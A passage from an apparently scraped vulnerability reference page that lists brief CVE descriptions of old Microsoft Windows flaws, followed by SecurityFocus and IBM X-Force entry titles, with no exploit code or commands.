other versions, does not apply group policies to incoming users when the number of connections to the SYSVOL share exceeds the maximum, e.g. with a maximum number of licenses, which can allow remote authenticated users to bypass group policies. [CVE-2002-0443] Microsoft Windows 2000 allows local users to bypass the policy that prohibits reusing old passwords by changing the current password before it expires, which does not enable the check for previous passwords. [CVE-2002-0373] The Windows Media Device Manager (WMDM) Service in Microsoft Windows Media Player 7.1 on Windows 2000 systems allows local users to obtain LocalSystem rights via a program that calls the WMDM service to connect to an invalid local storage device, aka "Privilege Elevation through Windows Media Device Manager Service". [CVE-2002-0372] Microsoft Windows Media Player versions 6.4 and 7.1 and Media Player for Windows XP allow remote attackers to bypass Internet Explorer's (IE) security mechanisms and run code via an executable .wma media file with a license installation requirement stored in the IE cache, aka the "Cache Path Disclosure via Windows Media Player". [CVE-2002-0370] Buffer overflow in the ZIP capability for multiple products allows remote attackers to cause a denial of service or execute arbitrary code via ZIP files containing entries with long filenames, including (1) Microsoft Windows 98 with Plus! Pack, (2) Windows XP, (3) Windows ME, (4) Lotus Notes R4 through R6 (pre-gold), (5) Verity KeyView, and (6) Stuffit Expander before 7.0. [CVE-2002-0224] The MSDTC (Microsoft Distributed Transaction Service Coordinator) for Microsoft Windows 2000, Microsoft IIS 5.0 and SQL Server 6.5 through SQL 2000 0.0 allows remote attackers to cause a denial of service (crash or hang) via malformed (random) input. [CVE-2002-0151] Buffer overflow in Multiple UNC Provider (MUP) in Microsoft Windows operating systems allows local users to cause a denial of service or possibly gain SYSTEM privileges via a long UNC request. [CVE-2002-0136] Microsoft Internet Explorer 5.5 on Windows 98 allows remote web pages to cause a denial of service (hang) via extremely long values for form fields such as INPUT and TEXTAREA, which can be automatically filled via Javascript. [CVE-2002-0055] SMTP service in Microsoft Windows 2000, Windows XP Professional, and Exchange 2000 allows remote attackers to cause a denial of service via a command with a malformed data transfer (BDAT) request. [CVE-2002-0054] SMTP service in (1) Microsoft Windows 2000 and (2) Internet Mail Connector (IMC) in Exchange Server 5.5 does not properly handle responses to NTLM authentication, which allows remote attackers to perform mail relaying via an SMTP AUTH command using null session credentials. [CVE-2002-0034] The Microsoft CONVERT.EXE program, when used on Windows 2000 and Windows XP systems, does not apply the default NTFS permissions when converting a FAT32 file system, which could cause the conversion to produce a file system with less secure permissions than expected. [CVE-2002-0018] In Microsoft Windows NT and Windows 2000, a trusting domain that receives authorization information from a trusted domain does not verify that the trusted domain is authoritative for all listed SIDs, which allows remote attackers to gain Domain Administrator privileges on the trusting domain by injecting SIDs from untrusted domains into the authorization data that comes from from the trusted domain. [CVE-2001-1451] Memory leak in the SNMP LAN Manager (LANMAN) MIB extension for Microsoft Windows 2000 before SP3, when the Print Spooler is not running, allows remote attackers to cause a denial of service (memory consumption) via a large number of GET or GETNEXT requests. [CVE-2001-1200] Microsoft Windows XP allows local users to bypass a locked screen and run certain programs that are associated with Hot Keys. [CVE-2001-1055] The Microsoft Windows network stack allows remote attackers to cause a denial of service (CPU consumption) via a flood of malformed ARP request packets with random source IP and MAC addresses, as demonstrated by ARPNuke. [CVE-2001-0909] Buffer overflow in helpctr.exe program in Microsoft Help Center for Windows XP allows remote attackers to execute arbitrary code via a long hcp: URL. [CVE-2001-0719] Buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via a malformed Advanced Streaming Format (ASF) file. [CVE-2001-0662] RPC endpoint mapper in Windows NT 4.0 allows remote attackers to cause a denial of service (loss of RPC services) via a malformed request. [CVE-2001-0541] Buffer overflow in Microsoft Windows Media Player 7.1 and earlier allows remote attackers to execute arbitrary commands via a malformed Windows Media Station (.NSC) file. [CVE-2001-0504] Vulnerability in authentication process for SMTP service in Microsoft Windows 2000 allows remote attackers to use incorrect credentials to gain privileges and conduct activites such as mail relaying. [CVE-2001-0351] Microsoft Windows 2000 telnet service allows a local user to make a certain system call that allows the user to terminate a Telnet session and cause a denial of service. [CVE-2001-0350] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the second of two variants of this vulnerability. [CVE-2001-0349] Microsoft Windows 2000 telnet service creates named pipes with predictable names and does not properly verify them, which allows local users to execute arbitrary commands by creating a named pipe with the predictable name and associating a malicious program with it, the first of two variants of this vulnerability. [CVE-2001-0348] Microsoft Windows 2000 telnet service allows attackers to cause a denial of service (crash) via a long logon command that contains a backspace. [CVE-2001-0347] Information disclosure vulnerability in Microsoft Windows 2000 telnet service allows remote attackers to determine the existence of user accounts such as Guest, or log in to the server without specifying the domain name, via a malformed userid. [CVE-2001-0346] Handle leak in Microsoft Windows 2000 telnet service allows attackers to cause a denial of service by starting a large number of sessions and terminating them. [CVE-2001-0345] Microsoft Windows 2000 telnet service allows attackers to prevent idle Telnet sessions from timing out, causing a denial of service by creating a large number of idle sessions. [CVE-2001-0261] Microsoft Windows 2000 Encrypted File System does not properly destroy backups of files that are encrypted, which allows a local attacker to recover the text of encrypted files. [CVE-2001-0245] Microsoft Index Server 2.0 in Windows NT 4.0, and Indexing Service in Windows 2000, allows remote attackers to read server-side include files via a malformed search request, aka a new variant of the "Malformed Hit-Highlighting" vulnerability. [CVE-2001-0242] Buffer overflows in Microsoft Windows Media Player 7 and earlier allow remote attackers to execute arbitrary commands via (1) a long version tag in an .ASX file, or (2) a long banner tag, a variant of the ".ASX Buffer Overrun" vulnerability as discussed in MS:MS00-090. [CVE-2001-0047] The default permissions for the MTS Package Administration registry key in Windows NT 4.0 allows local users to install or modify arbitrary Microsoft Transaction Server (MTS) packages and gain privileges, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability. [CVE-2000-1218] The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache. [CVE-2000-1217] Microsoft Windows 2000 before Service Pack 2 (SP2), when running in a non-Windows 2000 domain and using NTLM authentication, and when credentials of an account are locally cached, allows local users to bypass account lockout policies and make an unlimited number of login attempts, aka the "Domain Account Lockout" vulnerability. [CVE-2000-1113] Buffer overflow in Microsoft Windows Media Player allows remote attackers to execute arbitrary commands via a malformed Active Stream Redirector (.ASX) file, aka the ".ASX Buffer Overrun" vulnerability. [CVE-2000-1112] Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability. [CVE-2000-1079] Interactions between the CIFS Browser Protocol and NetBIOS as implemented in Microsoft Windows 95, 98, NT, and 2000 allow remote attackers to modify dynamic NetBIOS name cache entries via a spoofed Browse Frame Request in a unicast or UDP broadcast datagram. [CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability. [CVE-2000-0929] Microsoft Windows Media Player 7 allows attackers to cause a denial of service in RTF-enabled email clients via an embedded OCX control that is not closed properly, aka the "OCX Attachment" vulnerability. [CVE-2000-0858] Vulnerability in Microsoft Windows NT 4.0 allows remote attackers to cause a denial of service in IIS by sending it a series of malformed requests which cause INETINFO.EXE to fail, aka the "Invalid URL" vulnerability. [CVE-2000-0849] Race condition in Microsoft Windows Media server allows remote attackers to cause a denial of service in the Windows Media Unicast Service via a malformed request, aka the "Unicast Service Race Condition" vulnerability. [CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder. [CVE-2000-0742] The IPX protocol implementation in Microsoft Windows 95 and 98 allows remote attackers to cause a denial of service by sending a ping packet with a source IP address that is a broadcast address, aka the "Malformed IPX Ping Packet" vulnerability. [CVE-2000-0653] Microsoft Outlook Express allows remote attackers to monitor a user's email by creating a persistent browser link to the Outlook Express windows, aka the "Persistent Mail-Browser Link" vulnerability. [CVE-2000-0544] Windows NT and Windows 2000 hosts allow a remote attacker to cause a denial of service via malformed DCE/RPC SMBwriteX requests that contain an invalid data length. [CVE-2000-0495] Microsoft Windows Media Encoder allows remote attackers to cause a denial of service via a malformed request, aka the "Malformed Windows Media Encoder Request" vulnerability. [CVE-2000-0331] Buffer overflow in Microsoft command processor (CMD.EXE) for Windows NT and Windows 2000 allows a local user to cause a denial of service via a long environment variable, aka the "Malformed Environment Variable" vulnerability. [CVE-2000-0228] Microsoft Windows Media License Manager allows remote attackers to cause a denial of service by sending a malformed request that causes the manager to halt, aka the "Malformed Media License Request" Vulnerability. [CVE-2000-0216] Microsoft email clients in Outlook, Exchange, and Windows Messaging automatically respond to Read Receipt and Delivery Receipt tags, which could allow an attacker to flood a mail system with responses by forging a Read Receipt request that is redirected to a large distribution list. [CVE-2000-0168] Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. [CVE-2000-0089] The rdisk utility in Microsoft Terminal Server Edition and Windows NT 4.0 stores registry hive information in a temporary file with permissions that allow local users to read it, aka the "RDISK Registry Enumeration File" vulnerability. [CVE-1999-1291] TCP/IP implementation in Microsoft Windows 95, Windows NT 4.0, and possibly others, allows remote attackers to reset connections by forcing a reset (RST) via a PSH ACK or other means, obtaining the target's last sequence number from the resulting packet, then spoofing a reset to the target. [CVE-1999-1127] Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the "Named Pipes Over RPC" vulnerability. [CVE-1999-0969] The Windows NT RPC service allows remote attackers to conduct a denial of service using spoofed malformed RPC packets which generate an error message that is sent to the spoofed host, potentially setting up a loop, aka Snork. [CVE-1999-0749] Buffer overflow in Microsoft Telnet client in Windows 95 and Windows 98 via a malformed Telnet argument. [CVE-1999-0681] Buffer overflow in Microsoft FrontPage Server Extensions (PWS) 3.0.2.926 on Windows 95, and possibly other versions, allows remote attackers to cause a denial of service via a long URL. [CVE-1999-0386] Microsoft Personal Web Server and FrontPage Personal Web Server in some Windows systems allows a remote attacker to read files on the server by using a nonstandard URL. [CVE-1999-0288] The WINS server in Microsoft Windows NT 4.0 before SP4 allows remote attackers to cause a denial of service (process termination) via invalid UDP frames to port 137 (NETBIOS Name Service), as demonstrated via a flood of random packets. [CVE-1999-0228] Denial of service in RPCSS.EXE program (RPC Locator) in Windows NT. [CVE-1999-0227] Access violation in LSASS.EXE (LSA/LSARPC) program in Windows NT allows a denial of service. [CVE-1999-0012] Some web servers under Microsoft Windows allow remote attackers to bypass access restrictions for files with long file names. SecurityFocus - https://www.securityfocus.com/bid/: [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability [102055] Microsoft Windows RPC CVE-2017-11885 Remote Code Execution Vulnerability [99012] Microsoft Windows RPC CVE-2017-8461 Remote Code Execution Vulnerability [72933] Microsoft Windows 'Netlogon' RPC CVE-2015-0005 Spoofing Vulnerability [43119] Microsoft Windows RPC Memory Allocation Remote Code Execution Vulnerability [34443] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation Vulnerability [31874] Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability [25974] Microsoft Windows RPC NTLMSSP Remote Denial Of Service Vulnerability [18389] Microsoft Windows RPC Mutual Authentication Service Spoofing Vulnerability [14178] Microsoft Windows MSRPC Eventlog Information Disclosure Vulnerability [14177] Microsoft Windows MSRPC SVCCTL Service Enumeration Vulnerability [10127] Microsoft Windows RPCSS Service Remote Denial Of Service Vulnerability [10123] Microsoft Windows COM Internet Service/RPC Over HTTP Remote Denial Of Service Vulnerability [8811] Microsoft Windows RPCSS Multi-thread Race Condition Vulnerability [8234] Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability [8205] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [8104] Microsoft Windows 2000 Unauthorized RPC Connection Weakness [6769] Microsoft Windows 2000 RPC Service Privilege Escalation Vulnerability [6005] Microsoft Windows RPC Service Denial of Service Vulnerability [3313] Microsoft Windows NT RPC Endpoint Mapper Denial of Service Vulnerability [2234] Microsoft Windows NT RPC DoS Vulnerability [1673] Microsoft Windows 2000 Malformed RPC Packet DoS Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [61498] Microsoft Windows RPC code execution [52092] Microsoft Windows Workstation Service RPC message code execution [50797] Microsoft Windows RPC Marshalling Engine code execution [49581] Microsoft Windows RPCSS privilege escalation [46040] Microsoft Windows Server Service RPC code execution [36803] Microsoft Windows RPC NTLMSSP authentication denial of service [33629] Microsoft Windows DNS Server RPC interface buffer overflow [26836] Microsoft Windows RPC mutual authentication spoofing [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [23066] Microsoft Windows XP and 2000 Server MSRPC memory allocation denial of service [22481] Microsoft Windows MSRPC Plug and Play buffer overflow [17646] Microsoft Windows RPC Runtime Library obtain information [16208] Microsoft Windows RPC Locator Service buffer overflow exploit attempt detected [15709] Microsoft Windows COM Internet Service and RPC over HTTP denial of service [15708] Microsoft Windows RPCSS Service RPC message can cause denial of service [13426] Microsoft Windows 2000 and XP RPC race condition [13129] Microsoft Windows RPCSS DCOM buffer overflows [12747] Microsoft Windows RPC DCOM interface buffer overflow detected [12679] Microsoft Windows RPC DCOM denial of service [11273] Microsoft Windows 2000 RPC service could allow an attacker to gain elevated privileges [10400] Microsoft Windows 2000 RPC TCP port 135 denial of service [7528] Microsoft Windows NT and Windows 2000 malformed RPC request denial of service [7105] Microsoft Windows RPC endpoint mapper malformed request denial of service [5222] Microsoft Windows 2000 malformed RPC packet denial of service [1977] Microsoft Windows NT RPC services can be used to deplete system resources [17] Microsoft Windows NT RPC locator denial of service [86256] Microsoft Windows Knowledge Base Article 2876063 update is not installed [86097] Microsoft Windows Knowledge Base Article 2859537 update is not installed [86096] Microsoft Windows NTVDM privilege escalation 3 [86095] Microsoft Windows NTVDM privilege escalation 2 [86094] Microsoft Windows NTVDM privilege escalation 1 [86091] Microsoft Windows Knowledge Base Article 2868623 update is not installed [86090] Microsoft Windows ICMPv6 denial of service [86089] Microsoft Windows Knowledge Base Article 2862772 update is not installed [86075] Microsoft Windows Knowledge Base Article 2850869 update is not installed [86074] Microsoft Windows Unicode code execution [86073] Microsoft Windows Knowledge Base Article 2873872 update is not installed [86072] Microsoft Windows Active Directory Federation Services information disclosure [86070] Microsoft Windows Knowledge Base Article 2849568 update is not installed [86069] Microsoft Windows Windows NAT Driver denial of service [85801] Microsoft Windows Movie Maker .wav denial of service [85245] Microsoft Windows Knowledge Base Article 2848295 update is not installed [85244] Microsoft Windows Knowledge Base Article 2847927 update is not installed [85243] Microsoft Windows Knowledge Base Article 2861561 update is not installed [85236] Microsoft Windows Knowledge Base Article 2850851 update is not installed [85234] Microsoft Windows privilege escalation [85233] Microsoft Windows denial of service [85232] Microsoft Windows privilege escalation [85231] Microsoft Windows TrueType font file code execution [85230] Microsoft Windows privilege escalation [85229] Microsoft Windows privilege escalation [85228] Microsoft Windows privilege escalation [85227] Microsoft Windows Knowledge Base Article 2847883 update is not installed [85226] Microsoft Windows Media Format Runtime code execution [85224] Microsoft Windows DefenderCVE-2013-3154 privilege escalation [85223] Microsoft Windows Knowledge Base Article 2846071 update is not installed [85205] Microsoft Windows Knowledge Base Article 2845187 update is not installed [84621] Microsoft Windows Knowledge Base Article 2845690 update is not installed [84620] Microsoft Windows kernel denial of service [84619] Microsoft Windows Knowledge Base Article 2839894 update is not installed [84618] Microsoft Windows Print Spooler privilege escalation [84617] Microsoft Windows Knowledge Base Article 2839571 update is not installed [84615] Microsoft Windows Knowledge Base Article 2839229 update is not installed [84614] Microsoft Windows kernel information disclosure [84613] Microsoft Windows Knowledge Base Article 2838727 update is not installed [84571] Microsoft Windows denial of service [84546] Microsoft Windows Media Player .wav denial of service [84391] Microsoft Windows win32k.sys privilege escalation [84267] Microsoft Windows Update file detected [84156] Microsoft Windows Knowledge Base Article 2847204 update is not installed [83912] Microsoft Windows Knowledge Base Article 2829254 update is not installed [83911] Microsoft Windows denial of service [83910] Microsoft Windows Knowledge Base Article 2829530 update is not installed [83898] Microsoft Windows Knowledge Base Article 2830397 update is not installed [83886] Microsoft Windows Knowledge Base Article 2830399 update is not installed [83884] Microsoft Windows Knowledge Base Article 2834692 update is not installed [83882] Microsoft Windows Knowledge Base Article 2834695 update is not installed [83880] Microsoft Windows Knowledge Base Article 2836440 update is not installed [83876] Microsoft Windows Knowledge Base Article 2840221 update is not installed [83875] Microsoft Windows privilege escalation [83874] Microsoft Windows privilege escalation [83873] Microsoft Windows privilege escalation [83192] Microsoft Windows Knowledge Base Article 2817183 update is not installed [83100] Microsoft Windows Knowledge Base Article 2830914 update is not installed [83099] Microsoft Windows denial of service [83098] Microsoft Windows Knowledge Base Article 2829996 update is not installed [83097] Microsoft Windows privilege escalation [83096] Microsoft Windows privilege escalation [83095] Microsoft Windows denial of service [83094] Microsoft Windows privilege escalation [83093] Microsoft Windows Knowledge Base Article 2828223 update is not installed [83091] Microsoft Windows Knowledge Base Article 2813170 update is not installed [83090] Microsoft Windows privilege escalation [83089] Microsoft Windows privilege escalation [83088] Microsoft Windows Knowledge Base Article 2827663 update is not installed [83086] Microsoft Windows Knowledge Base Article 2823482 update is not installed [83084] Microsoft Windows Knowledge Base Article 2821818 update is not installed [83082] Microsoft Windows Knowledge Base Article 2820917 update is not installed [83081] Microsoft Windows Client/Server Run-time Subsystem privilege escalation [83063] Microsoft Windows Modern Mail spoofing [82776] Microsoft Internet Explorer 10 on Windows 8 sandbox security bypass [82775] Microsoft Windows kernel privilege escalation [82774] Microsoft Windows ASLR and DEP security bypass [82772] Microsoft Windows ASLR security bypass [82769] Microsoft Windows TTF denial of service [82600] Microsoft Windows Knowledge Base Article 2813707 update is not installed [82599] Microsoft Windows Live Essentials information disclosure [82523] RSA Authentication Agent for Microsoft Windows Quick Pin security bypass [82424] Microsoft Windows Knowledge Base Article 2814124 update is not installed [82422] Microsoft Windows Knowledge Base Article 2780176 update is not installed [82417] Microsoft Windows Knowledge Base Article 2801261 update is not installed [82415] Microsoft Windows Knowledge Base Article 2807986 update is not installed [82414] Microsoft Windows USB device privilege escalation [82413] Microsoft Windows USB device privilege escalation [82412] Microsoft Windows USB device privilege escalation [82410] Microsoft Windows Knowledge Base Article 2809289 update is not installed [82401] Microsoft Windows Knowledge Base Article 2813682 update is not installed [82399] Microsoft Windows Knowledge Base Article 2816264 update is not installed [82089] Microsoft Windows ZwSetInformationProcess() denial of service [81859] Microsoft Windows Knowledge Base Article 2802968 update is not installed [81858] Microsoft Windows OLE code execution [81857] Microsoft Windows Knowledge Base Article 2809279 update is not installed [81683] Microsoft Windows Knowledge Base Article 2780091 update is not installed [81682] Microsoft Windows .MPG code execution [81681] Microsoft Windows Knowledge Base Article 2784242 update is not installed [81680] Microsoft Windows Knowledge Base Article 2790113 update is not installed [81679] Microsoft Windows Client/Server Run-time Subsystem memory privilege escalation [81678] Microsoft Windows Knowledge Base Article 2790655 update is not installed [81677] Microsoft Windows TCP/IP sequence denial of service [81676] Microsoft Windows Knowledge Base Article 2790978 update is not installed [81675] Microsoft Windows NFS server denial of service [81674] Microsoft Windows Knowledge Base Article 2797052 update is not installed [81673] Microsoft Windows Vector Markup Language code execution [81672] Microsoft Windows Knowledge Base Article 2799494 update is not installed [81671] Microsoft Windows kernel privilege escalation [81670] Microsoft Windows kernel privilege escalation [81669] Microsoft Windows kernel privilege escalation [81668] Microsoft Windows Knowledge Base Article 2800277 update is not installed [81666] Microsoft Windows Knowledge Base Article 2778344 update is not installed [81665] Microsoft Windows CVE-2013-1277 privilege escalation [81664] Microsoft Windows CVE-2013-1276 privilege escalation [81663] Microsoft Windows CVE-2013-1275 privilege escalation [81662] Microsoft Windows CVE-2013-1274 privilege escalation [81661] Microsoft Windows CVE-2013-1273 privilege escalation [81660] Microsoft Windows CVE-2013-1272 privilege escalation [81659] Microsoft Windows CVE-2013-1271 privilege escalation [81658] Microsoft Windows CVE-2013-1270 privilege escalation [81657] Microsoft Windows CVE-2013-1269 privilege escalation [81656] Microsoft Windows CVE-2013-1268 privilege escalation [81655] Microsoft Windows CVE-2013-1267 privilege escalation [81654] Microsoft Windows CVE-2013-1266 privilege escalation [81653] Microsoft Windows CVE-2013-1265 privilege escalation [81652] Microsoft Windows CVE-2013-1264 privilege escalation [81651] Microsoft Windows CVE-2013-1263 privilege escalation [81650] Microsoft Windows CVE-2013-1262 privilege escalation [81649] Microsoft Windows CVE-2013-1261 privilege escalation [81648] Microsoft Windows CVE-2013-1260 privilege escalation [81647] Microsoft Windows CVE-2013-1259 privilege escalation [81646] Microsoft Windows CVE-2013-1258 privilege escalation [81645] Microsoft Windows CVE-2013-1257 privilege escalation [81644] Microsoft Windows CVE-2013-1256 privilege escalation [81643] Microsoft Windows CVE-2013-1255 privilege escalation [81642] Microsoft Windows CVE-2013-1254 privilege escalation [81641] Microsoft Windows CVE-2013-1253 privilege escalation [81640] Microsoft Windows CVE-2013-1252 privilege escalation [81639] Microsoft Windows CVE-2013-1251 privilege escalation [81638] Microsoft Windows CVE-2013-1250 privilege escalation [81637] Microsoft Windows CVE-2013-1249 privilege escalation [81636] Microsoft Windows CVE-2013-1248 privilege escalation [81634] Microsoft Windows Knowledge Base Article 2792100 update is not installed [81339] Microsoft Windows Knowledge Base Article 2799329 update is not installed [80918] Microsoft Windows digital certificate spoofing [80875] Microsoft Windows Knowledge Base Article 2756145 update is not installed [80874] Microsoft Windows XML code execution [80873] Microsoft Windows XML content code execution [80872] Microsoft Windows Knowledge Base Article 2769324 update is not installed [80869] Microsoft .NET Framework Windows Forms privilege escalation [80867] Microsoft Windows Knowledge Base Article 2769327 update is not installed [80865] Microsoft Windows Knowledge Base Article 2769369 update is not installed [80864] Microsoft Windows print spooler code execution [80863] Microsoft Windows Knowledge Base Article 2778930 update is not installed [80862] Microsoft Windows broadcast privilege escalation [80861] Microsoft Windows Knowledge Base Article 2785220 update is not installed [80860] Microsoft Windows SSL/TLS security bypass [80365] Microsoft Windows Knowledge Base Article 2761465 update is not installed [80360] Microsoft Windows Knowledge Base Article 2765809 update is not installed [80359] Microsoft Windows IPHTTPS security bypass [80358] Microsoft Windows Knowledge Base Article 2770660 update is not installed [80357] Microsoft Windows DirectPlay buffer overflow [80356] Microsoft Windows Knowledge Base Article 2780642 update is not installed [80352] Microsoft Windows Knowledge Base Article 2783534 update is not installed [80351] Microsoft Windows TrueType Fonts files code execution [80350] Microsoft Windows OpenType Font code execution [80349] Microsoft Windows Knowledge Base Article 2784126 update is not installed [79693] Microsoft Windows Knowledge Base Article 2745030 update is not installed [79687] Microsoft Windows Knowledge Base Article 2761451 update is not installed [79683] Microsoft Windows Knowledge Base Article 2761226 update is not installed [79682] Microsoft Windows font code execution [79681] Microsoft Windows kernel privilege escalation [79680] Microsoft Windows kernel privilege escalation [79679] Microsoft Windows Knowledge Base Article 2758857 update is not installed [79678] Microsoft Windows filenames code execution [79677] Microsoft Windows Knowledge Base Article 2727528 update is not installed [79676] Microsoft Windows Briefcase integer overflow [79675] Microsoft Windows Briefcase integer underflow [79648] Microsoft Windows Help Viewer denial of service [79479] Microsoft Windows Media Player .avi denial of service [79124] Microsoft Windows IKE privilege escalation [78864] Microsoft Windows Knowledge Base Article 2754670 update is not installed [78862] Microsoft Windows Knowledge Base Article 2743555 update is not installed [78861] Microsoft Windows Kerberos denial of service [78858] Microsoft Windows Knowledge Base Article 2754849 update is not installed [78856] Microsoft Windows Knowledge Base Article 2724197 update is not installed [78855] Microsoft Windows kernel privilege escalation [78853] Microsoft Windows Knowledge Base Article 2741517 update is not installed [78851] Microsoft Windows Knowledge Base Article 2742319 update is not installed [78848] Microsoft Windows Knowledge Base Article 2742321 update is not installed [78760] Microsoft Windows Knowledge Base Article 2744842 update is not installed [78620] Microsoft Windows Phone 7 domain name spoofing [78077] Microsoft Windows Knowledge Base Article 2741528 update is not installed [78075] Microsoft Windows Knowledge Base Article 2720184 update is not installed [78071] Microsoft Windows Knowledge Base Article 2748552 update is not installed [77512] Microsoft Windows Knowledge Base Article 2740358 update is not installed [77362] Microsoft Windows Knowledge Base Article 2733918 update is not installed [77360] Microsoft Windows Knowledge Base Article 2733829 update is not installed [77357] Microsoft Windows Knowledge Base Article 2733594 update is not installed [77356] Microsoft Windows RAP response packet buffer overflow [77355] Microsoft Windows RAP response packet buffer overflow [77354] Microsoft Windows Print Spooler service format string [77353] Microsoft Windows Remote Administration Protocol denial of service [77352] Microsoft Windows Knowledge Base Article 2731879 update is not installed [77350] Microsoft Windows Knowledge Base Article 2731847 update is not installed [77349] Microsoft Windows memory privilege escalation [77348] Microsoft Windows Knowledge Base Article 2723135 update is not installed [77347] Microsoft Windows Remote Desktop Protocol code execution [77346] Microsoft Windows Knowledge Base Article 2722913 update is not installed [77342] Microsoft Windows Knowledge Base Article 2720573 update is not installed [77341] Microsoft Windows ActiveX control code execution [77325] Microsoft Windows Knowledge Base Article 2719584 update is not installed [77323] Microsoft Windows Knowledge Base Article 2706045 update is not installed [77322] Microsoft Windows VBScript and JScript and Microsoft Internet Explorer object integer overflow [77244] nginx and Microsoft Windows request security bypass [76808] Microsoft Windows Knowledge Base Article 2721015 update is not installed [76725] Microsoft Windows Knowledge Base Article 2722479 update is not installed [76724] Microsoft Windows Knowledge Base Article 2719177 update is not installed [76721] Microsoft Windows Knowledge Base Article 2718523 update is not installed [76720] Microsoft Windows hook procedure privilege escalation [76719] Microsoft Windows keyboard privilege escalation [76718] Microsoft Windows Knowledge Base Article 2698365 update is not installed [76711] Microsoft Windows Knowledge Base Article 2695502 update is not installed [76707] Microsoft Windows search scopes information disclosure [76704] Microsoft Windows Knowledge Base Article 2691442 update is not installed [76703] Microsoft Windows file code execution [76702] Microsoft Windows Knowledge Base Article 2655992 update is not installed [76701] Microsoft Windows TLS information disclosure [76223] Microsoft Windows .otf denial of service [76221] Microsoft Windows XML Core Services code execution [76026] Microsoft Windows Microsoft Certificate Authority spoofing [75963] Microsoft Windows Knowledge Base Article 2699988 update is not installed [75949] Microsoft Windows Knowledge Base Article 2707960 update is not installed [75942] Microsoft Windows Knowledge Base Article 2706726 update is not installed [75939] Microsoft Windows Knowledge Base Article 2685939 update is not installed [75938] Microsoft Windows RDP code execution [75934] Microsoft Windows Knowledge Base Article 2709162 update is not installed [75933] Microsoft Windows thread privilege escalation [75932] Microsoft Windows font privilege escalation [75931] "Microsoft Windows Clipboard Format Atom Name privilege escalation" [75930] Microsoft Windows String Atom Class Name privilege escalation [75929] Microsoft Windows String Atom Class Name privilege escalation [75928] Microsoft Windows Knowledge Base Article 2711167 update is not installed [75927] Microsoft Windows User Mode Scheduler privilege escalation [75926] Microsoft Windows Knowledge Base Article 2709100 update is not installed [75905] Microsoft Windows Knowledge Base Article 2707956 update is not installed [75772] Microsoft Windows keyboard layout privilege escalation [75329] Microsoft Windows xxxCreateWindowEx() denial of service [75140] Microsoft Windows scrollbar calculation privilege escalation [75139] Microsoft Windows Keyboard Layout files privilege escalation [75138] Microsoft Windows messages privilege escalation [75136] Microsoft Windows Knowledge Base Article 2693777 update is not installed [75132] Microsoft Windows Knowledge Base Article 2690533 update is not installed [75131] Microsoft Windows Plug and Play (PnP) privilege escalation [75130] Microsoft Windows Knowledge Base Article 2688338 update is not installed [75129] Microsoft Windows IPv6 address privilege escalation [75128] Microsoft Windows broadcast packets security bypass [75127] Microsoft Windows Knowledge Base Article 2681578 update is not installed [75126] Microsoft Windows GDI+ EMF buffer overflow [75125] Microsoft Windows GDI+ EMF code execution [75124] Microsoft Windows TrueType code execution [75123] Microsoft Windows Knowledge Base Article 2680352 update is not installed [75116] Microsoft Windows Knowledge Base Article 2597981 update is not installed [74556] Microsoft Windows Knowledge Base Article 2639185 update is not installed [74384] Microsoft Windows Knowledge Base Article 2675157 update is not installed [74378] Microsoft Windows Knowledge Base Article 2671605 update is not installed [74373] Microsoft Windows Knowledge Base Article 2664258 update is not installed [74372] Microsoft Windows MSCOMCTL.OCX ActiveX control code execution [74369] Microsoft Windows Knowledge Base Article 2663860 update is not installed [73543] Microsoft Windows Knowledge Base Article 2671387 update is not installed [73542] Microsoft Windows Remote Desktop Protocol denial of service [73541] Microsoft Windows Remote Desktop Protocol code execution [73540] Microsoft Windows Knowledge Base Article 2665364 update is not installed [73538] Microsoft Windows Knowledge Base Article 2651019 update is not installed [73536] Microsoft Windows Knowledge Base Article 2651018 update is not installed [73533] Microsoft Windows Knowledge Base Article 2647170 update is not installed [73532] Microsoft Windows DNS Server denial of service [73530] Microsoft Windows Knowledge Base Article 2641653 update is not installed [73529] Microsoft Windows PostMessage function privilege escalation [73356] Microsoft Windows DNS security bypass [72950] Microsoft Windows IPv6 information disclosure [72887] Microsoft Windows Knowledge Base Article 2663841 update is not installed [72873] Microsoft Windows Knowledge Base Article 2663830 update is not installed [72867] Microsoft Windows Knowledge Base Article 2663510 update is not installed [72857] Microsoft Windows Knowledge Base Article 2661637 update is not installed [72855] Microsoft Windows Knowledge Base Article 2660465 update is not installed [72854] Microsoft Windows keyboard privilege escalation [72853] Microsoft Windows Knowledge Base Article 2653956 update is not installed [72852] Microsoft Windows Authenticode code execution [72851] Microsoft Windows Knowledge Base Article 2654428 update is not installed [72850] Microsoft Windows msvcrt dynamic link library buffer overflow [72849] Microsoft Windows Knowledge Base Article 2651026 update is not installed [72846] 